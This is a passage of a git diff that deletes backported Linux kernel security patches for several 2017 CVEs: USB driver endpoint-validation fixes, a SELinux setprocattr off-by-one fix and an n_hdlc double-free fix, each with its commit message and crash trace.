-+ (void *)__get_free_pages(GFP_KERNEL|__GFP_COMP|__GFP_ZERO|
-+ __GFP_NOWARN, pg);
- if (!sk->write_page) {
- snd_printk(KERN_WARNING "couldn't __get_free_pages()\n");
- usb_stream_free(sk);
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0003.patch
deleted file mode 100644
index e7e332f1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0003.patch
+++ /dev/null
@@ -1,89 +0,0 @@ -From 70e743e4cec3733dc13559f6184b35d358b9ef3f Mon Sep 17 00:00:00 2001 -From: Andrey Konovalov -Date: Thu, 14 Sep 2017 16:52:59 +0200 -Subject: [PATCH] uwb: ensure that endpoint is interrupt - -hwarc_neep_init() assumes that endpoint 0 is interrupt, but there's no -check for that, which results in a WARNING in USB core code, when a bad -USB descriptor is provided from a device: - -usb 1-1: BOGUS urb xfer, pipe 1 != type 3 -------------[ cut here ]------------ -WARNING: CPU: 0 PID: 3 at drivers/usb/core/urb.c:449 usb_submit_urb+0xf8a/0x11d0 -Modules linked in: -CPU: 0 PID: 3 Comm: kworker/0:0 Not tainted 4.13.0+ #111 -Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 -Workqueue: usb_hub_wq hub_event -task: ffff88006bdc1a00 task.stack: ffff88006bde8000 -RIP: 0010:usb_submit_urb+0xf8a/0x11d0 drivers/usb/core/urb.c:448 -RSP: 0018:ffff88006bdee3c0 EFLAGS: 00010282 -RAX: 0000000000000029 RBX: ffff8800672a7200 RCX: 0000000000000000 -RDX: 0000000000000029 RSI: ffff88006c815c78 RDI: ffffed000d7bdc6a -RBP: ffff88006bdee4c0 R08: fffffbfff0fe00ff R09: fffffbfff0fe00ff -R10: 0000000000000018 R11: fffffbfff0fe00fe R12: 1ffff1000d7bdc7f -R13: 0000000000000003 R14: 0000000000000001 R15: ffff88006b02cc90 -FS: 0000000000000000(0000) GS:ffff88006c800000(0000) knlGS:0000000000000000 -CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 -CR2: 00007fe4daddf000 CR3: 000000006add6000 CR4: 00000000000006f0 -Call Trace: - hwarc_neep_init+0x4ce/0x9c0 drivers/uwb/hwa-rc.c:710 - uwb_rc_add+0x2fb/0x730 drivers/uwb/lc-rc.c:361 - hwarc_probe+0x34e/0x9b0 drivers/uwb/hwa-rc.c:858 - usb_probe_interface+0x351/0x8d0 drivers/usb/core/driver.c:361 - really_probe drivers/base/dd.c:385 - driver_probe_device+0x610/0xa00 drivers/base/dd.c:529 - __device_attach_driver+0x230/0x290 drivers/base/dd.c:625 - bus_for_each_drv+0x15e/0x210 drivers/base/bus.c:463 - __device_attach+0x269/0x3c0 drivers/base/dd.c:682 - device_initial_probe+0x1f/0x30 drivers/base/dd.c:729 - 
bus_probe_device+0x1da/0x280 drivers/base/bus.c:523 - device_add+0xcf9/0x1640 drivers/base/core.c:1703 - usb_set_configuration+0x1064/0x1890 drivers/usb/core/message.c:1932 - generic_probe+0x73/0xe0 drivers/usb/core/generic.c:174 - usb_probe_device+0xaf/0xe0 drivers/usb/core/driver.c:266 - really_probe drivers/base/dd.c:385 - driver_probe_device+0x610/0xa00 drivers/base/dd.c:529 - __device_attach_driver+0x230/0x290 drivers/base/dd.c:625 - bus_for_each_drv+0x15e/0x210 drivers/base/bus.c:463 - __device_attach+0x269/0x3c0 drivers/base/dd.c:682 - device_initial_probe+0x1f/0x30 drivers/base/dd.c:729 - bus_probe_device+0x1da/0x280 drivers/base/bus.c:523 - device_add+0xcf9/0x1640 drivers/base/core.c:1703 - usb_new_device+0x7b8/0x1020 drivers/usb/core/hub.c:2457 - hub_port_connect drivers/usb/core/hub.c:4890 - hub_port_connect_change drivers/usb/core/hub.c:4996 - port_event drivers/usb/core/hub.c:5102 - hub_event+0x23c8/0x37c0 drivers/usb/core/hub.c:5182 - process_one_work+0x9fb/0x1570 kernel/workqueue.c:2097 - worker_thread+0x1e4/0x1350 kernel/workqueue.c:2231 - kthread+0x324/0x3f0 kernel/kthread.c:231 - ret_from_fork+0x25/0x30 arch/x86/entry/entry_64.S:425 -Code: 48 8b 85 30 ff ff ff 48 8d b8 98 00 00 00 e8 8e 93 07 ff 45 89 -e8 44 89 f1 4c 89 fa 48 89 c6 48 c7 c7 a0 e5 55 86 e8 20 08 8f fd <0f> -ff e9 9b f7 ff ff e8 4a 04 d6 fd e9 80 f7 ff ff e8 60 11 a6 ----[ end trace 55d741234124cfc3 ]--- - -Check that endpoint is interrupt. - -Found by syzkaller. 
- -Signed-off-by: Andrey Konovalov -Cc: stable -Signed-off-by: Greg Kroah-Hartman ---- - drivers/uwb/hwa-rc.c | 2 ++ - 1 file changed, 2 insertions(+) - -diff --git a/drivers/uwb/hwa-rc.c b/drivers/uwb/hwa-rc.c -index 35a1e777b4497..9a53912bdfe9f 100644 ---- a/drivers/uwb/hwa-rc.c -+++ b/drivers/uwb/hwa-rc.c -@@ -825,6 +825,8 @@ static int hwarc_probe(struct usb_interface *iface, - - if (iface->cur_altsetting->desc.bNumEndpoints < 1) - return -ENODEV; -+ if (!usb_endpoint_xfer_int(&iface->cur_altsetting->endpoint[0].desc)) -+ return -ENODEV; - - result = -ENOMEM; - uwb_rc = uwb_rc_alloc(); diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0004.patch deleted file mode 100644 index d635e950..00000000 --- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0004.patch +++ /dev/null 
@@ -1,39 +0,0 @@
-From 122d6a347329818419b032c5a1776e6b3866d9b9 Mon Sep 17 00:00:00 2001
-From: Cameron Gutman
-Date: Tue, 12 Sep 2017 11:27:44 -0700
-Subject: [PATCH] Input: xpad - validate USB endpoint type during probe
-
-We should only see devices with interrupt endpoints. Ignore any other
-endpoints that we find, so we don't send try to send them interrupt URBs
-and trigger a WARN down in the USB stack.
-
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Cc: # c01b5e7464f0 Input: xpad - don't depend on endpoint order
-Signed-off-by: Cameron Gutman
-Signed-off-by: Dmitry Torokhov
----
- drivers/input/joystick/xpad.c | 10 ++++++----
- 1 file changed, 6 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
-index 2578a76770404..f670dcb401c05 100644
---- a/drivers/input/joystick/xpad.c
-+++ b/drivers/input/joystick/xpad.c
-@@ -1750,10 +1750,12 @@ static int xpad_probe(struct usb_interface *intf, const struct usb_device_id *id
- struct usb_endpoint_descriptor *ep =
- &intf->cur_altsetting->endpoint[i].desc;
-
-- if (usb_endpoint_dir_in(ep))
-- ep_irq_in = ep;
-- else
-- ep_irq_out = ep;
-+ if (usb_endpoint_xfer_int(ep)) {
-+ if (usb_endpoint_dir_in(ep))
-+ ep_irq_in = ep;
-+ else
-+ ep_irq_out = ep;
-+ }
- }
-
- if (!ep_irq_in || !ep_irq_out) {
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0005.patch
deleted file mode 100644
index f28a1e6b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0005.patch
+++ /dev/null
@@ -1,74 +0,0 @@ -From 0a8fd1346254974c3a852338508e4a4cddbb35f1 Mon Sep 17 00:00:00 2001 -From: Alan Stern -Date: Mon, 19 Dec 2016 12:03:41 -0500 -Subject: [PATCH] USB: fix problems with duplicate endpoint addresses - -When checking a new device's descriptors, the USB core does not check -for duplicate endpoint addresses. This can cause a problem when the -sysfs files for those endpoints are created; trying to create multiple -files with the same name will provoke a WARNING: - -WARNING: CPU: 2 PID: 865 at fs/sysfs/dir.c:31 sysfs_warn_dup+0x8a/0xa0 -sysfs: cannot create duplicate filename -'/devices/platform/dummy_hcd.0/usb2/2-1/2-1:64.0/ep_05' -Kernel panic - not syncing: panic_on_warn set ... - -CPU: 2 PID: 865 Comm: kworker/2:1 Not tainted 4.9.0-rc7+ #34 -Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 -Workqueue: usb_hub_wq hub_event - ffff88006bee64c8 ffffffff81f96b8a ffffffff00000001 1ffff1000d7dcc2c - ffffed000d7dcc24 0000000000000001 0000000041b58ab3 ffffffff8598b510 - ffffffff81f968f8 ffffffff850fee20 ffffffff85cff020 dffffc0000000000 -Call Trace: - [< inline >] __dump_stack lib/dump_stack.c:15 - [] dump_stack+0x292/0x398 lib/dump_stack.c:51 - [] panic+0x1cb/0x3a9 kernel/panic.c:179 - [] __warn+0x1c4/0x1e0 kernel/panic.c:542 - [] warn_slowpath_fmt+0xc5/0x110 kernel/panic.c:565 - [] sysfs_warn_dup+0x8a/0xa0 fs/sysfs/dir.c:30 - [] sysfs_create_dir_ns+0x178/0x1d0 fs/sysfs/dir.c:59 - [< inline >] create_dir lib/kobject.c:71 - [] kobject_add_internal+0x227/0xa60 lib/kobject.c:229 - [< inline >] kobject_add_varg lib/kobject.c:366 - [] kobject_add+0x139/0x220 lib/kobject.c:411 - [] device_add+0x353/0x1660 drivers/base/core.c:1088 - [] device_register+0x1d/0x20 drivers/base/core.c:1206 - [] usb_create_ep_devs+0x163/0x260 drivers/usb/core/endpoint.c:195 - [] create_intf_ep_devs+0x13b/0x200 drivers/usb/core/message.c:1030 - [] usb_set_configuration+0x1083/0x18d0 drivers/usb/core/message.c:1937 - [] generic_probe+0x6e/0xe0 
drivers/usb/core/generic.c:172 - [] usb_probe_device+0xaa/0xe0 drivers/usb/core/driver.c:263 - -This patch prevents the problem by checking for duplicate endpoint -addresses during enumeration and skipping any duplicates. - -Signed-off-by: Alan Stern -Reported-by: Andrey Konovalov -Tested-by: Andrey Konovalov -CC: -Signed-off-by: Greg Kroah-Hartman ---- - drivers/usb/core/config.c | 10 ++++++++++ - 1 file changed, 10 insertions(+) - -diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c -index 0aa9e7d697a5d..25dbd8c7aec73 100644 ---- a/drivers/usb/core/config.c -+++ b/drivers/usb/core/config.c -@@ -239,6 +239,16 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum, - if (ifp->desc.bNumEndpoints >= num_ep) - goto skip_to_next_endpoint_or_interface_descriptor; - -+ /* Check for duplicate endpoint addresses */ -+ for (i = 0; i < ifp->desc.bNumEndpoints; ++i) { -+ if (ifp->endpoint[i].desc.bEndpointAddress == -+ d->bEndpointAddress) { -+ dev_warn(ddev, "config %d interface %d altsetting %d has a duplicate endpoint with address 0x%X, skipping\n", -+ cfgno, inum, asnum, d->bEndpointAddress); -+ goto skip_to_next_endpoint_or_interface_descriptor; -+ } -+ } -+ - endpoint = &ifp->endpoint[ifp->desc.bNumEndpoints]; - ++ifp->desc.bNumEndpoints; - diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0006.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0006.patch deleted file mode 100644 index f33cb0d2..00000000 --- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0006.patch +++ /dev/null 
@@ -1,96 +0,0 @@ -From f9a1c372299fed53d4b72bb601f7f3bfe6f9999c Mon Sep 17 00:00:00 2001 -From: Takashi Iwai -Date: Mon, 6 Nov 2017 10:47:14 +0100 -Subject: [PATCH] ALSA: usx2y: Fix invalid stream URBs - -The us122l driver creates URBs per the fixed endpoints, and this may -end up with URBs with inconsistent pipes when a fuzzer or a malicious -program deals with the manipulated endpoints. It ends up with a -kernel warning like: - - usb 1-1: BOGUS urb xfer, pipe 0 != type 3 - ------------[ cut here ]------------ - WARNING: CPU: 0 PID: 24 at drivers/usb/core/urb.c:471 - usb_submit_urb+0x113e/0x1400 - Call Trace: - usb_stream_start+0x48a/0x9f0 sound/usb/usx2y/usb_stream.c:690 - us122l_start+0x116/0x290 sound/usb/usx2y/us122l.c:365 - us122l_create_card sound/usb/usx2y/us122l.c:502 - us122l_usb_probe sound/usb/usx2y/us122l.c:588 - .... - -For avoiding the bad access, this patch adds a few sanity checks of -the validity of created URBs like previous similar fixes using the new -usb_urb_ep_type_check() helper function. 
- -Reported-by: Andrey Konovalov -Tested-by: Andrey Konovalov -Signed-off-by: Takashi Iwai ---- - sound/usb/usx2y/usb_stream.c | 23 +++++++++++++++++------ - 1 file changed, 17 insertions(+), 6 deletions(-) - -diff --git a/sound/usb/usx2y/usb_stream.c b/sound/usb/usx2y/usb_stream.c -index e229abd216526..b0f8979ff2d2f 100644 ---- a/sound/usb/usx2y/usb_stream.c -+++ b/sound/usb/usx2y/usb_stream.c -@@ -56,7 +56,7 @@ static void playback_prep_freqn(struct usb_stream_kernel *sk, struct urb *urb) - lb, s->period_size); - } - --static void init_pipe_urbs(struct usb_stream_kernel *sk, unsigned use_packsize, -+static int init_pipe_urbs(struct usb_stream_kernel *sk, unsigned use_packsize, - struct urb **urbs, char *transfer, - struct usb_device *dev, int pipe) - { -@@ -77,6 +77,8 @@ static void init_pipe_urbs(struct usb_stream_kernel *sk, unsigned use_packsize, - urb->interval = 1; - if (usb_pipeout(pipe)) - continue; -+ if (usb_urb_ep_type_check(urb)) -+ return -EINVAL; - - urb->transfer_buffer_length = transfer_length; - desc = urb->iso_frame_desc; -@@ -87,9 +89,11 @@ static void init_pipe_urbs(struct usb_stream_kernel *sk, unsigned use_packsize, - desc[p].length = maxpacket; - } - } -+ -+ return 0; - } - --static void init_urbs(struct usb_stream_kernel *sk, unsigned use_packsize, -+static int init_urbs(struct usb_stream_kernel *sk, unsigned use_packsize, - struct usb_device *dev, int in_pipe, int out_pipe) - { - struct usb_stream *s = sk->s; -@@ -103,9 +107,12 @@ static void init_urbs(struct usb_stream_kernel *sk, unsigned use_packsize, - sk->outurb[u] = usb_alloc_urb(sk->n_o_ps, GFP_KERNEL); - } - -- init_pipe_urbs(sk, use_packsize, sk->inurb, indata, dev, in_pipe); -- init_pipe_urbs(sk, use_packsize, sk->outurb, sk->write_page, dev, -- out_pipe); -+ if (init_pipe_urbs(sk, use_packsize, sk->inurb, indata, dev, in_pipe) || -+ init_pipe_urbs(sk, use_packsize, sk->outurb, sk->write_page, dev, -+ out_pipe)) -+ return -EINVAL; -+ -+ return 0; - } - - -@@ -226,7 +233,11 @@ 
struct usb_stream *usb_stream_new(struct usb_stream_kernel *sk, - else - sk->freqn = get_usb_high_speed_rate(sample_rate); - -- init_urbs(sk, use_packsize, dev, in_pipe, out_pipe); -+ if (init_urbs(sk, use_packsize, dev, in_pipe, out_pipe) < 0) { -+ usb_stream_free(sk); -+ return NULL; -+ } -+ - sk->s->state = usb_stream_stopped; - out: - return sk->s; diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0007.patch.disabled b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0007.patch.disabled deleted file mode 100644 index 917a1c73..00000000 --- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0007.patch.disabled +++ /dev/null 
@@ -1,51 +0,0 @@ -From 58fc7f73a85d45a47057dad2af53502fdf6cf778 Mon Sep 17 00:00:00 2001 -From: Takashi Iwai -Date: Wed, 4 Oct 2017 15:07:21 +0200 -Subject: [PATCH] ALSA: caiaq: Add a sanity check for invalid EPs - -As syzkaller spotted, currently caiaq driver submits a URB with the -fixed EP without checking whether it's actually available, which may -result in a kernel warning like: - usb 1-1: BOGUS urb xfer, pipe 3 != type 1 - ------------[ cut here ]------------ - WARNING: CPU: 1 PID: 1150 at drivers/usb/core/urb.c:449 - usb_submit_urb+0xf8a/0x11d0 - Modules linked in: - CPU: 1 PID: 1150 Comm: kworker/1:1 Not tainted - 4.14.0-rc2-42660-g24b7bd59eec0 #277 - Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 - Workqueue: usb_hub_wq hub_event - Call Trace: - init_card sound/usb/caiaq/device.c:467 - snd_probe+0x81c/0x1150 sound/usb/caiaq/device.c:525 - usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361 - .... - -This patch adds a sanity check of validity of EPs at the device -initialization phase for avoiding the call with an invalid EP. - -Reported-by: Andrey Konovalov -Tested-by: Andrey Konovalov -Signed-off-by: Takashi Iwai ---- - sound/usb/caiaq/device.c | 7 +++++++ - 1 file changed, 7 insertions(+) - -diff --git a/sound/usb/caiaq/device.c b/sound/usb/caiaq/device.c -index 0fb6b1b792617..a29674bf96e57 100644 ---- a/sound/usb/caiaq/device.c -+++ b/sound/usb/caiaq/device.c -@@ -461,6 +461,13 @@ static int init_card(struct snd_usb_caiaqdev *cdev) - cdev->midi_out_buf, EP1_BUFSIZE, - snd_usb_caiaq_midi_output_done, cdev); - -+ /* sanity checks of EPs before actually submitting */ -+ if (usb_urb_ep_type_check(&cdev->ep1_in_urb) || -+ usb_urb_ep_type_check(&cdev->midi_out_urb)) { -+ dev_err(dev, "invalid EPs\n"); -+ return -EINVAL; -+ } -+ - init_waitqueue_head(&cdev->ep1_wait_queue); - init_waitqueue_head(&cdev->prepare_wait_queue); - 
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0008.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0008.patch
deleted file mode 100644
index 2c457bc7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0008.patch
+++ /dev/null
@@ -1,52 +0,0 @@ -From 2a4340c57717162c6bf07a0860d05711d4de994b Mon Sep 17 00:00:00 2001 -From: Takashi Iwai -Date: Wed, 4 Oct 2017 15:09:24 +0200 -Subject: [PATCH] ALSA: line6: Add a sanity check for invalid EPs - -As syzkaller spotted, currently line6 drivers submit a URB with the -fixed EP without checking whether it's actually available, which may -result in a kernel warning like: - usb 1-1: BOGUS urb xfer, pipe 3 != type 1 - ------------[ cut here ]------------ - WARNING: CPU: 0 PID: 24 at drivers/usb/core/urb.c:449 - usb_submit_urb+0xf8a/0x11d0 - Modules linked in: - CPU: 0 PID: 24 Comm: kworker/0:1 Not tainted 4.14.0-rc2-42613-g1488251d1a98 #238 - Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 - Workqueue: usb_hub_wq hub_event - Call Trace: - line6_start_listen+0x55f/0x9e0 sound/usb/line6/driver.c:82 - line6_init_cap_control sound/usb/line6/driver.c:690 - line6_probe+0x7c9/0x1310 sound/usb/line6/driver.c:764 - podhd_probe+0x64/0x70 sound/usb/line6/podhd.c:474 - usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361 - .... - -This patch adds a sanity check of validity of EPs at the device -initialization phase for avoiding the call with an invalid EP. 
- -Reported-by: Andrey Konovalov -Tested-by: Andrey Konovalov -Signed-off-by: Takashi Iwai ---- - sound/usb/line6/driver.c | 7 +++++++ - 1 file changed, 7 insertions(+) - -diff --git a/sound/usb/line6/driver.c b/sound/usb/line6/driver.c -index 0ff5a7d2e19fe..0da6f68761e3e 100644 ---- a/sound/usb/line6/driver.c -+++ b/sound/usb/line6/driver.c -@@ -78,6 +78,13 @@ static int line6_start_listen(struct usb_line6 *line6) - line6->buffer_listen, LINE6_BUFSIZE_LISTEN, - line6_data_received, line6); - } -+ -+ /* sanity checks of EP before actually submitting */ -+ if (usb_urb_ep_type_check(line6->urb_listen)) { -+ dev_err(line6->ifcdev, "invalid control EP\n"); -+ return -EINVAL; -+ } -+ - line6->urb_listen->actual_length = 0; - err = usb_submit_urb(line6->urb_listen, GFP_ATOMIC); - return err; diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0009.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0009.patch deleted file mode 100644 index 3590c21d..00000000 --- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0009.patch +++ /dev/null 
@@ -1,52 +0,0 @@ -From 6815a0b444572527256f0d0efd8efe3ddede6018 Mon Sep 17 00:00:00 2001 -From: Takashi Iwai -Date: Wed, 4 Oct 2017 15:03:40 +0200 -Subject: [PATCH] ALSA: bcd2000: Add a sanity check for invalid EPs - -As syzkaller spotted, currently bcd2000 driver submits a URB with the -fixed EP without checking whether it's actually available, which may -result in a kernel warning like: - usb 1-1: BOGUS urb xfer, pipe 1 != type 3 - ------------[ cut here ]------------ - WARNING: CPU: 0 PID: 1846 at drivers/usb/core/urb.c:449 - usb_submit_urb+0xf8a/0x11d0 - Modules linked in: - CPU: 0 PID: 1846 Comm: kworker/0:2 Not tainted - 4.14.0-rc2-42613-g1488251d1a98 #238 - Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 - Workqueue: usb_hub_wq hub_event - Call Trace: - bcd2000_init_device sound/usb/bcd2000/bcd2000.c:289 - bcd2000_init_midi sound/usb/bcd2000/bcd2000.c:345 - bcd2000_probe+0xe64/0x19e0 sound/usb/bcd2000/bcd2000.c:406 - usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361 - .... - -This patch adds a sanity check of validity of EPs at the device -initialization phase for avoiding the call with an invalid EP. - -Reported-by: Andrey Konovalov -Tested-by: Andrey Konovalov -Signed-off-by: Takashi Iwai ---- - sound/usb/bcd2000/bcd2000.c | 7 +++++++ - 1 file changed, 7 insertions(+) - -diff --git a/sound/usb/bcd2000/bcd2000.c b/sound/usb/bcd2000/bcd2000.c -index 7371e5b060356..a6408209d7f1d 100644 ---- a/sound/usb/bcd2000/bcd2000.c -+++ b/sound/usb/bcd2000/bcd2000.c -@@ -342,6 +342,13 @@ static int bcd2000_init_midi(struct bcd2000 *bcd2k) - bcd2k->midi_out_buf, BUFSIZE, - bcd2000_output_complete, bcd2k, 1); - -+ /* sanity checks of EPs before actually submitting */ -+ if (usb_urb_ep_type_check(bcd2k->midi_in_urb) || -+ usb_urb_ep_type_check(bcd2k->midi_out_urb)) { -+ dev_err(&bcd2k->dev->dev, "invalid MIDI EP\n"); -+ return -EINVAL; -+ } -+ - bcd2000_init_device(bcd2k); - - return 0; 
diff --git a/Patches/Linux_CVEs/CVE-2017-2618/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-2618/3.10/0001.patch
deleted file mode 100644
index 657ed90d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-2618/3.10/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@ -From a71b4196a72f09ed223d8140de7fd47ccdaf6e2b Mon Sep 17 00:00:00 2001 -From: Stephen Smalley -Date: Tue, 31 Jan 2017 11:54:04 -0500 -Subject: selinux: fix off-by-one in setprocattr - -commit 0c461cb727d146c9ef2d3e86214f498b78b7d125 upstream. - -SELinux tries to support setting/clearing of /proc/pid/attr attributes -from the shell by ignoring terminating newlines and treating an -attribute value that begins with a NUL or newline as an attempt to -clear the attribute. However, the test for clearing attributes has -always been wrong; it has an off-by-one error, and this could further -lead to reading past the end of the allocated buffer since commit -bb646cdb12e75d82258c2f2e7746d5952d3e321a ("proc_pid_attr_write(): -switch to memdup_user()"). Fix the off-by-one error. - -Even with this fix, setting and clearing /proc/pid/attr attributes -from the shell is not straightforward since the interface does not -support multiple write() calls (so shells that write the value and -newline separately will set and then immediately clear the attribute, -requiring use of echo -n to set the attribute), whereas trying to use -echo -n "" to clear the attribute causes the shell to skip the -write() call altogether since POSIX says that a zero-length write -causes no side effects. Thus, one must use echo -n to set and echo -without -n to clear, as in the following example: -$ echo -n unconfined_u:object_r:user_home_t:s0 > /proc/$$/attr/fscreate -$ cat /proc/$$/attr/fscreate -unconfined_u:object_r:user_home_t:s0 -$ echo "" > /proc/$$/attr/fscreate -$ cat /proc/$$/attr/fscreate - -Note the use of /proc/$$ rather than /proc/self, as otherwise -the cat command will read its own attribute value, not that of the shell. - -There are no users of this facility to my knowledge; possibly we -should just get rid of it. - -UPDATE: Upon further investigation it appears that a local process -with the process:setfscreate permission can cause a kernel panic as a -result of this bug. 
This patch fixes CVE-2017-2618. - -Signed-off-by: Stephen Smalley -[PM: added the update about CVE-2017-2618 to the commit description] -Signed-off-by: Paul Moore -Signed-off-by: Jiri Slaby -Signed-off-by: James Morris -Signed-off-by: Willy Tarreau ---- - security/selinux/hooks.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c -index fdd6e4f..c08d4a1 100644 ---- a/security/selinux/hooks.c -+++ b/security/selinux/hooks.c -@@ -5442,7 +5442,7 @@ static int selinux_setprocattr(struct task_struct *p, - return error; - - /* Obtain a SID for the context, if one was specified. */ -- if (size && str[1] && str[1] != '\n') { -+ if (size && str[0] && str[0] != '\n') { - if (str[size-1] == '\n') { - str[size-1] = 0; - size--; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-2636/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-2636/^4.10/0001.patch deleted file mode 100644 index 92d13d14..00000000 --- a/Patches/Linux_CVEs/CVE-2017-2636/^4.10/0001.patch +++ /dev/null 
@@ -1,313 +0,0 @@ -From 82f2341c94d270421f383641b7cd670e474db56b Mon Sep 17 00:00:00 2001 -From: Alexander Popov -Date: Tue, 28 Feb 2017 19:54:40 +0300 -Subject: tty: n_hdlc: get rid of racy n_hdlc.tbuf - -Currently N_HDLC line discipline uses a self-made singly linked list for -data buffers and has n_hdlc.tbuf pointer for buffer retransmitting after -an error. - -The commit be10eb7589337e5defbe214dae038a53dd21add8 -("tty: n_hdlc add buffer flushing") introduced racy access to n_hdlc.tbuf. -After tx error concurrent flush_tx_queue() and n_hdlc_send_frames() can put -one data buffer to tx_free_buf_list twice. That causes double free in -n_hdlc_release(). - -Let's use standard kernel linked list and get rid of n_hdlc.tbuf: -in case of tx error put current data buffer after the head of tx_buf_list. - -Signed-off-by: Alexander Popov -Cc: stable -Signed-off-by: Greg Kroah-Hartman ---- - drivers/tty/n_hdlc.c | 132 +++++++++++++++++++++++++++------------------------ - 1 file changed, 69 insertions(+), 63 deletions(-) - -diff --git a/drivers/tty/n_hdlc.c b/drivers/tty/n_hdlc.c -index 1bacbc3..e94aea8 100644 ---- a/drivers/tty/n_hdlc.c -+++ b/drivers/tty/n_hdlc.c -@@ -114,7 +114,7 @@ - #define DEFAULT_TX_BUF_COUNT 3 - - struct n_hdlc_buf { -- struct n_hdlc_buf *link; -+ struct list_head list_item; - int count; - char buf[1]; - }; -@@ -122,8 +122,7 @@ struct n_hdlc_buf { - #define N_HDLC_BUF_SIZE (sizeof(struct n_hdlc_buf) + maxframe) - - struct n_hdlc_buf_list { -- struct n_hdlc_buf *head; -- struct n_hdlc_buf *tail; -+ struct list_head list; - int count; - spinlock_t spinlock; - }; -@@ -136,7 +135,6 @@ struct n_hdlc_buf_list { - * @backup_tty - TTY to use if tty gets closed - * @tbusy - reentrancy flag for tx wakeup code - * @woke_up - FIXME: describe this field -- * @tbuf - currently transmitting tx buffer - * @tx_buf_list - list of pending transmit frame buffers - * @rx_buf_list - list of received frame buffers - * @tx_free_buf_list - list unused transmit frame buffers 
-@@ -149,7 +147,6 @@ struct n_hdlc { - struct tty_struct *backup_tty; - int tbusy; - int woke_up; -- struct n_hdlc_buf *tbuf; - struct n_hdlc_buf_list tx_buf_list; - struct n_hdlc_buf_list rx_buf_list; - struct n_hdlc_buf_list tx_free_buf_list; -@@ -159,6 +156,8 @@ struct n_hdlc { - /* - * HDLC buffer list manipulation functions - */ -+static void n_hdlc_buf_return(struct n_hdlc_buf_list *buf_list, -+ struct n_hdlc_buf *buf); - static void n_hdlc_buf_put(struct n_hdlc_buf_list *list, - struct n_hdlc_buf *buf); - static struct n_hdlc_buf *n_hdlc_buf_get(struct n_hdlc_buf_list *list); -@@ -208,16 +207,9 @@ static void flush_tx_queue(struct tty_struct *tty) - { - struct n_hdlc *n_hdlc = tty2n_hdlc(tty); - struct n_hdlc_buf *buf; -- unsigned long flags; - - while ((buf = n_hdlc_buf_get(&n_hdlc->tx_buf_list))) - n_hdlc_buf_put(&n_hdlc->tx_free_buf_list, buf); -- spin_lock_irqsave(&n_hdlc->tx_buf_list.spinlock, flags); -- if (n_hdlc->tbuf) { -- n_hdlc_buf_put(&n_hdlc->tx_free_buf_list, n_hdlc->tbuf); -- n_hdlc->tbuf = NULL; -- } -- spin_unlock_irqrestore(&n_hdlc->tx_buf_list.spinlock, flags); - } - - static struct tty_ldisc_ops n_hdlc_ldisc = { -@@ -283,7 +275,6 @@ static void n_hdlc_release(struct n_hdlc *n_hdlc) - } else - break; - } -- kfree(n_hdlc->tbuf); - kfree(n_hdlc); - - } /* end of n_hdlc_release() */ -@@ -402,13 +393,7 @@ static void n_hdlc_send_frames(struct n_hdlc *n_hdlc, struct tty_struct *tty) - n_hdlc->woke_up = 0; - spin_unlock_irqrestore(&n_hdlc->tx_buf_list.spinlock, flags); - -- /* get current transmit buffer or get new transmit */ -- /* buffer from list of pending transmit buffers */ -- -- tbuf = n_hdlc->tbuf; -- if (!tbuf) -- tbuf = n_hdlc_buf_get(&n_hdlc->tx_buf_list); -- -+ tbuf = n_hdlc_buf_get(&n_hdlc->tx_buf_list); - while (tbuf) { - if (debuglevel >= DEBUG_LEVEL_INFO) - printk("%s(%d)sending frame %p, count=%d\n", -@@ -420,7 +405,7 @@ static void n_hdlc_send_frames(struct n_hdlc *n_hdlc, struct tty_struct *tty) - - /* rollback was possible 
